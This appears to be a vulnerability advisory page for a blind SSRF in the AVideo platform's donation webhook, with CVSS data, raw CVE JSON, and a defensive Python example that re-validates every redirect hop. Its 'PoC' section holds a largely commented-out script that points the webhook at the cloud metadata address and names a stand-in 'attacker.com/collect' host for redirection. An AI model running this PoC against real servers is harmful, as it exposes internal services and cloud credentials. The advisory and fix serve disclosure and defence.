Security Vulnerability Report
CVE-2026-43879 CVSS 5.4 MEDIUM


Published: 2026-05-11 22:22:12
Last Modified: 2026-05-11 22:22:12

Description

WWBN AVideo is an open source video platform. In versions up to and including 29.0, an authenticated user can configure their own donation-notification webhook URL to point at internal/loopback/metadata hosts (e.g. http://127.0.0.1:8080/..., http://169.254.169.254/latest/..., RFC1918 addresses). When any other user (including a second account owned by the same attacker) donates even a trivial amount via plugin/CustomizeUser/donate.json.php, the AVideo server issues a curl POST to the attacker-supplied URL, resulting in a blind SSRF. The handler uses only isValidURL() (which is a format check) and does not call the codebase's own isSSRFSafeURL() helper. Additionally, CURLOPT_FOLLOWLOCATION is enabled with no per-hop revalidation, so even if the stored URL were validated, an HTTP 307 from an attacker-controlled host could redirect the POST to internal targets. Commit aaacd48f29f1ff71d1eb5fc81d37605f593cefa9 contains an updated fix.
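The two defects named above (a format-only URL check and curl following redirects without re-checking each hop) are both fixable in the webhook sender. The example below is an added illustration written for this report; it is not AVideo's isSSRFSafeURL(), not the donate.json.php handler, and not the code in the referenced commit. It goes slightly beyond the description: the destination check covers literal IPv4/IPv6 addresses, IPv4-mapped IPv6 literals, and hostnames whose records are all required to be public (a name with one public and one internal record is refused), and the sender follows redirects itself so that every hop is validated before it is requested. The hostnames, the fake resolver and the fake HTTP sender are constructed stand-ins so the code runs offline.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

# Added example: destination-aware SSRF check plus a webhook sender that
# re-validates every redirect hop. NOT AVideo's own isSSRFSafeURL() or donate
# handler; function names, FAKE_DNS and FAKE_HTTP are assumptions for this demo.

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def is_public_ip(ip):
    """True only for globally routable unicast addresses."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # treat ::ffff:127.0.0.1 as 127.0.0.1
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_ssrf_safe_url(url, resolver=socket.getaddrinfo):
    """Format check plus destination check: scheme must be http(s) and every
    address the host resolves to must be public. A host with one internal and
    one public record is rejected rather than left to chance."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    host = parsed.hostname
    try:
        return is_public_ip(ipaddress.ip_address(host))  # literal address, no DNS needed
    except ValueError:
        pass  # not a literal, resolve it
    try:
        infos = resolver(host, None)
    except socket.gaierror:
        return False  # unresolvable: fail closed
    addrs = {ipaddress.ip_address(info[4][0]) for info in infos}
    return bool(addrs) and all(is_public_ip(a) for a in addrs)


def post_with_hop_validation(url, data, send, resolver=socket.getaddrinfo, max_redirects=3):
    """Follow redirects manually (the equivalent of CURLOPT_FOLLOWLOCATION off),
    validating each hop before it is requested. `send(url, data)` returns
    (status, headers). Raises ValueError on an unsafe hop or too many hops."""
    hops = []
    for _ in range(max_redirects + 1):
        if not is_ssrf_safe_url(url, resolver):
            raise ValueError(f"refusing unsafe webhook hop: {url}")
        hops.append(url)
        status, headers = send(url, data)
        location = headers.get("Location")
        if status in REDIRECT_STATUSES and location:
            url = urljoin(url, location)  # relative Location resolves against current hop
            continue
        return status, hops
    raise ValueError("too many redirects")


def deliver_webhook(url, data, send, resolver=socket.getaddrinfo):
    """Convenience wrapper returning (delivered, detail) instead of raising."""
    try:
        status, hops = post_with_hop_validation(url, data, send, resolver)
        return True, f"HTTP {status} after {len(hops)} hop(s)"
    except ValueError as exc:
        return False, str(exc)


# --- constructed offline stand-ins for DNS and HTTP (not real hosts or records) ---
FAKE_DNS = {
    "hooks.example.net": ["93.184.216.34"],
    "redirector.example.org": ["93.184.216.35"],
    "split.example.org": ["93.184.216.36", "10.0.0.5"],  # one public, one internal record
    "localhost": ["127.0.0.1", "::1"],
}


def fake_resolver(host, port=None):
    """Mimics socket.getaddrinfo's return shape using FAKE_DNS."""
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed: no record for {host}")
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, 0)) for ip in FAKE_DNS[host]]


FAKE_HTTP = {
    "https://hooks.example.net/notify": (200, {}),
    # a public host answering 307 toward the metadata service, as in the description
    "https://redirector.example.org/hook": (307, {"Location": "http://169.254.169.254/latest/meta-data/"}),
}


def fake_send(url, data):
    """Stand-in for the curl POST; never touches the network."""
    return FAKE_HTTP.get(url, (404, {}))


if __name__ == "__main__":
    for target in ("https://hooks.example.net/notify", "https://redirector.example.org/hook",
                   "http://127.0.0.1:8080/admin", "https://split.example.org/hook"):
        print(target, "->", deliver_webhook(target, {"amount": 1}, fake_send, fake_resolver))
```

One caveat worth carrying into a real fix: the check resolves the name once and the HTTP client resolves it again when connecting, so a record that changes between the two lookups (DNS rebinding) can still slip through. Pin the validated address for the connection (with curl, CURLOPT_RESOLVE serves that purpose) or validate at the socket layer rather than only on the URL string.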

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)


WWBN AVideo <= 29.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import sys

# This is a conceptual PoC for CVE-2026-43879
# It simulates the attacker setting a malicious webhook and triggering the donation.

# Target configuration
target_url = "http://localhost/avideo"  # Replace with actual target
attacker_controlled_server = "http://attacker.com/collect"
internal_target = "http://169.254.169.254/latest/meta-data/"

# Step 1: Authenticate and get session (Assumed credentials)
session = requests.Session()
login_payload = {
    "user": "attacker",
    "pass": "password",
    "rememberme": 0
}
# login_resp = session.post(f"{target_url}/objects/userLogin.json.php", data=login_payload)
# if login_resp.status_code != 200:
#     print("Login failed")
#     sys.exit(1)

# Step 2: Configure the malicious donation webhook
# The vulnerability allows setting the URL to internal hosts directly or via redirection
webhook_config_url = f"{target_url}/plugin/CustomizeUser/donate.json.php"
# In a real scenario, we need to find the exact endpoint to save the configuration.
# Assuming an endpoint exists to update user preferences.
payload = {
    "webhook": internal_target,  # Direct internal hit
    # OR use redirection: "webhook": attacker_controlled_server (which 307 redirects to internal_target)
}
print(f"[+] Attempting to set webhook to: {internal_target}")
# config_resp = session.post(webhook_config_url, data=payload)

# Step 3: Trigger the donation to invoke the webhook
# This causes the server to send a POST request to the webhook URL
print("[+] Triggering donation to invoke SSRF...")
# donate_resp = session.post(f"{target_url}/plugin/CustomizeUser/donate.json.php", data={"amount": 0.01})
print("[+] Check your internal server logs or attacker server for the request.")

References

https://github.com/WWBN/AVideo/commit/aaacd48f29f1ff71d1eb5fc81d37605f593cefa9
https://github.com/WWBN/AVideo/security/advisories/GHSA-wp38-whx3-xffh
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-43879",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T22:22:12.390",
    "lastModified": "2026-05-11T22:22:12.390",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, an authenticated user can configure their own donation-notification webhook URL to point at internal/loopback/metadata hosts (e.g. http://127.0.0.1:8080/..., http://169.254.169.254/latest/..., RFC1918 addresses). When any other user (including a second account owned by the same attacker) donates even a trivial amount via plugin/CustomizeUser/donate.json.php, the AVideo server issues a curl POST to the attacker-supplied URL, resulting in a blind SSRF. The handler uses only isValidURL() (which is a format check) and does not call the codebase's own isSSRFSafeURL() helper. Additionally, CURLOPT_FOLLOWLOCATION is enabled with no per-hop revalidation, so even if the stored URL were validated, an HTTP 307 from an attacker-controlled host could redirect the POST to internal targets.\nCommit aaacd48f29f1ff71d1eb5fc81d37605f593cefa9 contains an updated fix."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/WWBN/AVideo/commit/aaacd48f29f1ff71d1eb5fc81d37605f593cefa9",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-wp38-whx3-xffh",
        "source": "[email protected]"
      }
    ]
  }
}